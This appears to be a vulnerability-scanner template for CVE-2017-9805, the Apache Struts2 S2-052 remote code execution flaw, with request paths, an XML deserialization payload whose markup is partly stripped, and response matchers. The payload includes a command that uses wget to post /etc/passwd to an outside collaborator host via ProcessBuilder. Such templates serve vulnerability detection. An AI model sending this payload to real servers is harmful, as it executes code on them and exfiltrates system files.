id: CVE-2017-9805 info: name: Apache Struts2 S2-052 RCE author: pikpikcu severity: critical reference: https://nvd.nist.gov/vuln/detail/CVE-2017-9805 tags: cve,cve2017,apache,rce,struts requests: - method: POST path: - "{{BaseURL}}/struts2-rest-showcase/orders/3" - "{{BaseURL}}/orders/3" headers: Content-Type: application/xml body: | 0 false 0 wget --post-file /etc/passwd burpcollaborator.net false java.lang.ProcessBuilder start

asdasd asdasd false 0 0 false false 0 matchers-condition: and matchers: - type: word words: - "Debugging information" - "com.thoughtworks.xstream.converters.collections.MapConverter" condition: and - type: status status: - 500